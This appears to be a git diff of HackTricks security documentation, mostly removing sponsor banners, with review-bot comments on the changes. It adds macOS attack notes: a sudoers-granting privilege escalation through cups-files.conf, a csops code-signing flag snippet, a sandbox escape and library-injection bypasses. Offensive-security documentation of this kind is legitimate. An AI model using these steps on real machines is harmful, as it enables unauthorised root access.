-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
{{#include ../../banners/hacktricks-training.md}}
@@ -131,14 +124,6 @@ sudo chattr -i file.txt #Remove the bit so you can delete it
7z l file.zip
```
-
-
-\
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-
## Bash for Windows
```bash
@@ -325,10 +310,4 @@ iptables -P OUTPUT ACCEPT
{{#include ../../banners/hacktricks-training.md}}
-
-\
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
diff --git a/src/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md b/src/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md
index 5391e3c9d..5099beb65 100644
--- a/src/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md
+++ b/src/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md
@@ -2,14 +2,6 @@
{{#include ../../banners/hacktricks-training.md}}
-
-
-\
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-
## Common Limitations Bypasses
### Reverse Shell
@@ -356,12 +348,6 @@ If you are inside a filesystem with the **read-only and noexec protections** or
- [https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0)
- [https://www.secjuice.com/web-application-firewall-waf-evasion/](https://www.secjuice.com/web-application-firewall-waf-evasion/)
-
-
-\
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-unix/privilege-escalation/exploiting-yum.md b/src/linux-unix/privilege-escalation/exploiting-yum.md
index c4bec532f..627bf66d7 100644
--- a/src/linux-unix/privilege-escalation/exploiting-yum.md
+++ b/src/linux-unix/privilege-escalation/exploiting-yum.md
@@ -23,3 +23,5 @@ The example below creates a package that includes a before-install trigger with
```
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-unix/privilege-escalation/interesting-groups-linux-pe.md b/src/linux-unix/privilege-escalation/interesting-groups-linux-pe.md
index e790cd37d..5fec677b3 100644
--- a/src/linux-unix/privilege-escalation/interesting-groups-linux-pe.md
+++ b/src/linux-unix/privilege-escalation/interesting-groups-linux-pe.md
@@ -1,11 +1,6 @@
+
{{#include ../../banners/hacktricks-training.md}}
-
-
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=command-injection" %}
# Sudo/Admin Groups
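Review bot: the `+` blank line added at the very top of interesting-groups-linux-pe.md, before the banner include, is out of step with every other file in this diff, which starts directly with the `{{#include ...}}` line; drop it so the file layout stays uniform.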
@@ -171,11 +166,7 @@ You can mount the root filesystem of the host machine to an instance’s volume,
[lxc - Privilege Escalation](lxd-privilege-escalation.md)
-
-
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=command-injection" %}
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-auto-start-locations.md b/src/macos-hardening/macos-auto-start-locations.md
index 5bfd0ae9a..d2780faa6 100644
--- a/src/macos-hardening/macos-auto-start-locations.md
+++ b/src/macos-hardening/macos-auto-start-locations.md
@@ -1794,3 +1794,5 @@ RunService ()
- [https://github.com/D00MFist/PersistentJXA](https://github.com/D00MFist/PersistentJXA)
{{#include ../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-red-teaming/README.md b/src/macos-hardening/macos-red-teaming/README.md
index 3701205f8..09b6c1e73 100644
--- a/src/macos-hardening/macos-red-teaming/README.md
+++ b/src/macos-hardening/macos-red-teaming/README.md
@@ -2,13 +2,6 @@
{{#include ../../banners/hacktricks-training.md}}
-
-
-**Get a hacker's perspective on your web apps, network, and cloud**
-
-**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
## Abusing MDMs
@@ -254,12 +247,7 @@ When a file is downloaded in Safari, if its a "safe" file, it will be **automati
- [**Come to the Dark Side, We Have Apples: Turning macOS Management Evil**](https://www.youtube.com/watch?v=pOQOh07eMxY)
- [**OBTS v3.0: "An Attackers Perspective on Jamf Configurations" - Luke Roberts / Calum Hall**](https://www.youtube.com/watch?v=ju1IYWUv4ZA)
-
-
-**Get a hacker's perspective on your web apps, network, and cloud**
-
-**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-red-teaming/macos-keychain.md b/src/macos-hardening/macos-red-teaming/macos-keychain.md
index a6135959d..177798fe0 100644
--- a/src/macos-hardening/macos-red-teaming/macos-keychain.md
+++ b/src/macos-hardening/macos-red-teaming/macos-keychain.md
@@ -132,3 +132,5 @@ And these are the **requirements** to be able to **export a secret without a pro
- [**#OBTS v5.0: "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY)
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-red-teaming/macos-mdm/README.md b/src/macos-hardening/macos-red-teaming/macos-mdm/README.md
index 1a4f69c6e..30ef4cbb4 100644
--- a/src/macos-hardening/macos-red-teaming/macos-mdm/README.md
+++ b/src/macos-hardening/macos-red-teaming/macos-mdm/README.md
@@ -201,3 +201,5 @@ enrolling-devices-in-other-organisations.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md b/src/macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md
index 19851b925..2c8dc0ad4 100644
--- a/src/macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md
+++ b/src/macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md
@@ -51,3 +51,5 @@ The research highlighted significant security concerns:
1. **Information Disclosure**: By providing a DEP-registered serial number, sensitive organizational information contained in the DEP profile can be retrieved.
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md b/src/macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md
index 4b373d774..28e9aaee6 100644
--- a/src/macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md
+++ b/src/macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md
@@ -38,3 +38,5 @@ This character varies from 'C' (representing the first half of 2010) to 'Z' (sec
Digits 1-9 correspond to weeks 1-9. Letters C-Y (excluding vowels and 'S') represent weeks 10-27. For the second half of the year, 26 is added to this number.
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/README.md
index 7fa9d3ae9..3a0450178 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/README.md
@@ -2,21 +2,6 @@
{{#include ../../banners/hacktricks-training.md}}
-
-
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
-
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
-
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
-
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
-
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
-
## Basic MacOS
If you are not familiar with macOS, you should start learning the basics of macOS:
@@ -132,19 +117,6 @@ macos-privilege-escalation.md
- [**https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ**](https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ)
- [**https://www.youtube.com/watch?v=vMGiplQtjTY**](https://www.youtube.com/watch?v=vMGiplQtjTY)
-
-
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
-
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
-
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
-
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
-
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
-
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md
index 306efd482..5b8b45324 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md
@@ -69,3 +69,5 @@ macos-system-extensions.md
- [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md
index 424ed20b7..2fcc7d8e8 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md
@@ -356,3 +356,5 @@ static void customConstructor(int argc, const char **argv) {
- [https://nshipster.com/method-swizzling/](https://nshipster.com/method-swizzling/)
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md
index 5381cb0d0..35469c807 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md
@@ -230,3 +230,5 @@ After the array is created you can see all the exported functions:
> If you remember, to **call** an **exported** function from user space we don't need to call the name of the function, but the **selector number**. Here you can see that the selector **0** is the function **`initializeDecoder`**, the selector **1** is **`startDecoder`**, the selector **2** **`initializeEncoder`**...
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md
index c62c79223..a90363d6b 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md
@@ -849,3 +849,5 @@ For more info check:
- [https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/)
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
index 4258ded90..627f62657 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
@@ -148,3 +148,5 @@ nm -a binaries/com.apple.security.sandbox | wc -l
- [https://www.youtube.com/watch?v=hGKOskSiaQo](https://www.youtube.com/watch?v=hGKOskSiaQo)
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md
index bb6bb0697..a41b2c95e 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md
@@ -8,3 +8,5 @@
[**PoC**](https://github.com/jhftss/POC/tree/main/CVE-2022-46722).
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
index 83bdf0dc2..6a9ebaa76 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
@@ -81,3 +81,5 @@ At the end this was fixed by giving the new permission **`kTCCServiceEndpointSec
- [**https://knight.sc/reverse%20engineering/2019/08/24/system-extension-internals.html**](https://knight.sc/reverse%20engineering/2019/08/24/system-extension-internals.html)
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md
index 7e9bb6e6d..08567ad22 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md
@@ -32,3 +32,5 @@ The list of firmlinks can be found in the **`/usr/share/firmlinks`** file.
```
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md
index 4561700b5..831fb3bd2 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-basic-objective-c.md
@@ -346,3 +346,5 @@ It's also possible to manage files **using `NSURL` objects instead of `NSString`
```
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md
index 7d376dfe5..e97f1be4c 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md
@@ -84,3 +84,5 @@ macos-proces-abuse/
- [https://www.youtube.com/watch?v=UlT5KFTMn2k](https://www.youtube.com/watch?v=UlT5KFTMn2k)
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md
index a41d941e4..29a9dc9f9 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md
@@ -17,3 +17,5 @@
- [**ReiKey**](https://objective-see.org/products/reikey.html): Objective-See application to find **keyloggers** that install keyboard "event taps"
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md
index a1a52c47b..210dd1928 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md
@@ -164,3 +164,5 @@ sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "[+] dylib"
```
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md
index 6ff21c8e4..6d789ddd4 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-file-extension-apps.md
@@ -70,3 +70,5 @@ grep -A3 CFBundleTypeExtensions Info.plist | grep string
```
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-gcd-grand-central-dispatch.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-gcd-grand-central-dispatch.md
index 7f66f04fa..89b1f1b76 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-gcd-grand-central-dispatch.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-gcd-grand-central-dispatch.md
@@ -223,3 +223,5 @@ Ghidra will automatically rewrite everything:
- [**\*OS Internals, Volume I: User Mode. By Jonathan Levin**](https://www.amazon.com/MacOS-iOS-Internals-User-Mode/dp/099105556X)
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md
index fa8e2aeb4..2b9f486ce 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md
@@ -245,3 +245,5 @@ macos-files-folders-and-binaries/macos-sensitive-locations.md
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-protocols.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-protocols.md
index ea04eac00..cc012147d 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-protocols.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-protocols.md
@@ -126,3 +126,5 @@ sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.mDNSResponder.p
- [**https://lockboxx.blogspot.com/2019/07/macos-red-teaming-206-ard-apple-remote.html**](https://lockboxx.blogspot.com/2019/07/macos-red-teaming-206-ard-apple-remote.html)
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md
index 991e34f0b..6de0e5c0f 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md
@@ -30,10 +30,16 @@ Example in: [https://theevilbit.github.io/posts/exploiting_directory_permissions
## Symbolic Link / Hard Link
+### Permissive file/folder
+
If a privileged process is writing data in **file** that could be **controlled** by a **lower privileged user**, or that could be **previously created** by a lower privileged user. The user could just **point it to another file** via a Symbolic or Hard link, and the privileged process will write on that file.
Check in the other sections where an attacker could **abuse an arbitrary write to escalate privileges**.
+### Open `O_NOFOLLOW`
+
+The flag `O_NOFOLLOW` when used by the function `open` won't follow a symlink in the last path component, but it will follow the rest of the path. The correct way to prevent following symlinks in the path is by using the flag `O_NOFOLLOW_ANY`.
+
## .fileloc
Files with **`.fileloc`** extension can point to other applications or binaries so when they are open, the application/binary will be the one executed.\
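Review bot: the `O_NOFOLLOW` sentence is imprecise in a way that matters for this page: with `O_NOFOLLOW`, `open` does not "not follow" a final-component symlink and open something else, it fails (with `ELOOP`) when the last component is a symlink, while symlinks in the intermediate components are still resolved; reword to say that, since it is exactly the intermediate-component case that makes the flag insufficient. Also state that `O_NOFOLLOW_ANY` is an Apple extension to `open(2)` rather than a POSIX flag, so a reader does not expect it on Linux. Lastly, the new `### Permissive file/folder` heading now sits directly above a sentence fragment ("If a privileged process is writing data in **file** that could be ... The user could just ..."); this is a good moment to join it into one sentence.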
@@ -52,11 +58,15 @@ Example:
```
-## Arbitrary FD
+## File Descriptors
+
+### Leak FD (no `O_CLOEXEC`)
+
+If a call to `open` doesn't have the flag `O_CLOEXEC` the file descriptor will be inherited by the child process. So, if a privileged process opens a privileged file and executes a process controlled by the attacker, the attacker will **inherit the FD over the privielged file**.
If you can make a **process open a file or a folder with high privileges**, you can abuse **`crontab`** to open a file in `/etc/sudoers.d` with **`EDITOR=exploit.py`**, so the `exploit.py` will get the FD to the file inside `/etc/sudoers` and abuse it.
-For example: [https://youtu.be/f1HA5QhLQ7Y?t=21098](https://youtu.be/f1HA5QhLQ7Y?t=21098)
+For example: [https://youtu.be/f1HA5QhLQ7Y?t=21098](https://youtu.be/f1HA5QhLQ7Y?t=21098), code: https://github.com/gergelykalman/CVE-2023-32428-a-macOS-LPE-via-MallocStackLogging
## Avoid quarantine xattrs tricks
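Review bot: the `O_CLOEXEC` explanation conflates fork and exec: a child always inherits the parent's descriptors across `fork`, and `O_CLOEXEC` only controls whether the descriptor survives `execve`, so say "the descriptor survives when the process execs a binary controlled by the attacker" rather than "will be inherited by the child process". Fix the typo "privielged" in the same line, and turn the bare `code: https://github.com/gergelykalman/CVE-2023-32428-a-macOS-LPE-via-MallocStackLogging` into a markdown link like the video link next to it.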
@@ -154,6 +164,31 @@ Not really needed but I leave it there just in case:
macos-xattr-acls-extra-stuff.md
{{#endref}}
+## Bypass signature checks
+
+### Bypass platform binaries checks
+
+Some security checks check if the binary is a **platform binary**, for example to allow to connect to a XPC service. However, as exposed in on bypass in https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/ it's possible to bypass this check by getting a platform binary (like /bin/ls) and inject the exploit via dyld using en env variable `DYLD_INSERT_LIBRARIES`.
+
+### Bypass flags `CS_REQUIRE_LV` and `CS_FORCED_LV`
+
+It's possible for an executing binary to modify it's own flags to bypass checks with a code such as:
+
+```c
+// Code from https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/
+int pid = getpid();
+NSString *exePath = NSProcessInfo.processInfo.arguments[0];
+
+uint32_t status = SecTaskGetCodeSignStatus(SecTaskCreateFromSelf(0));
+status |= 0x2000; // CS_REQUIRE_LV
+csops(pid, 9, &status, 4); // CS_OPS_SET_STATUS
+
+status = SecTaskGetCodeSignStatus(SecTaskCreateFromSelf(0));
+NSLog(@"=====Inject successfully into %d(%@), csflags=0x%x", pid, exePath, status);
+```
+
+
+
## Bypass Code Signatures
Bundles contains the file **`_CodeSignature/CodeResources`** which contains the **hash** of every single **file** in the **bundle**. Note that the hash of CodeResources is also **embedded in the executable**, so we can't mess with that, either.
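Review bot: the heading `### Bypass flags CS_REQUIRE_LV and CS_FORCED_LV` promises two flags but the snippet only ORs in `0x2000` (`CS_REQUIRE_LV`), and it sets the flag rather than clearing it, so "modify its own flags to bypass checks" is misleading: what the code shows is a process granting itself `CS_REQUIRE_LV` so that a check which requires the flag passes; reword the sentence to say that, and either drop `CS_FORCED_LV` from the heading or show how it is handled. Typos in the same hunk: "as exposed in on bypass in" should be "as shown in one bypass in", "en env variable" should be "an env variable", and "it's own flags" should be "its own flags". The bare `https://jhftss.github.io/...` URL should be a markdown link like the rest of the page, and the three blank lines before `## Bypass Code Signatures` should collapse to one.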
@@ -279,6 +314,28 @@ The file **`/etc/paths`** is one of the main places that populates the PATH env
You can also write files in **`/etc/paths.d`** to load new folders into the `PATH` env variable.
+### cups-files.conf
+
+This technique was used in [this writeup](https://www.kandji.io/blog/macos-audit-story-part1).
+
+Create the file `/etc/cups/cups-files.conf` with the following content:
+
+```
+ErrorLog /etc/sudoers.d/lpe
+LogFilePerm 777
+
+```
+
+This will create the file `/etc/sudoers.d/lpe` with permissions 777. The extra junk at the end is to trigger the error log creation.
+
+Then, write in `/etc/sudoers.d/lpe` the needed config to escalate privileges like `%staff ALL=(ALL) NOPASSWD:ALL`.
+
+Then, modify the file `/etc/cups/cups-files.conf` again indicating `LogFilePerm 700` so the new sudoers file becomes valid invoking `cupsctl`.
+
+### Sandbox Escape
+
+It's posisble to escape the macOS sandbox with a FS arbitrary write. For some examples check the page [macOS Auto Start](../../../../macos-auto-start-locations.md) but a common one is to write a Terminal preferences file in `~/Library/Preferences/com.apple.Terminal.plist` that executes a command at startup and call it using `open`.
+
## Generate writable files as other users
This will generate a file that belongs to root that is writable by me ([**code from here**](https://github.com/gergelykalman/brew-lpe-via-periodic/blob/main/brew_lpe.sh)). This might also work as privesc:
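Review bot: the text says "The extra junk at the end is to trigger the error log creation", but the config block shows only `ErrorLog /etc/sudoers.d/lpe`, `LogFilePerm 777` and a trailing blank line, so the reader cannot see what the junk is; either include the offending line in the block or reword the sentence. The `LogFilePerm 700` step also needs its reason stated: sudo ignores a file in `/etc/sudoers.d` that is world-writable, which is why the permissions must be tightened before the entry works, and it should say what invoking `cupsctl` does in that step (presumably making cupsd re-read the config and re-create the log with the new mode). The link `../../../../macos-auto-start-locations.md` is one directory too deep: from `macos-fs-tricks/` four `../` resolve to `src/`, while the file lives at `src/macos-hardening/macos-auto-start-locations.md` (see the `diff --git a/src/macos-hardening/macos-auto-start-locations.md` header earlier in this patch), so it should be `../../../macos-auto-start-locations.md`. Typo: "posisble".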
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md
index 35232afa4..9ce8be51f 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md
@@ -2,9 +2,6 @@
{{#include ../../../banners/hacktricks-training.md}}
-
-
-{% embed url="https://websec.nl/" %}
## Gatekeeper
@@ -475,9 +472,6 @@ aa archive -d s/ -o app.aar
In an ".app" bundle if the quarantine xattr is not added to it, when executing it **Gatekeeper won't be triggered**.
-
-
-{% embed url="https://websec.nl/" %}
{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md
index 5bc3c7da9..79897f40a 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md
@@ -151,7 +151,9 @@ Important **system services** also run inside their own custom **sandbox** such
**App Store** apps use the **profile** **`/System/Library/Sandbox/Profiles/application.sb`**. You can check in this profile how entitlements such as **`com.apple.security.network.server`** allows a process to use the network.
-SIP is a Sandbox profile called platform_profile in /System/Library/Sandbox/rootless.conf
+Then, some **Apple daemon services** use different profiles located in `/System/Library/Sandbox/Profiles/*.sb` or `/usr/share/sandbox/*.sb`. These sandboxes are applied in the main funciton calling the API `sandbox_init_XXX`.
+
+**SIP** is a Sandbox profile called platform_profile in `/System/Library/Sandbox/rootless.conf`.
### Sandbox Profile Examples
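Review bot: typo "funciton" in "applied in the main funciton calling the API `sandbox_init_XXX`"; also "Then, some **Apple daemon services**" reads as a sequence step where none exists, "Also, some Apple daemon services" fits the paragraph better.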
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
index 8e917b9f3..51df66ce3 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
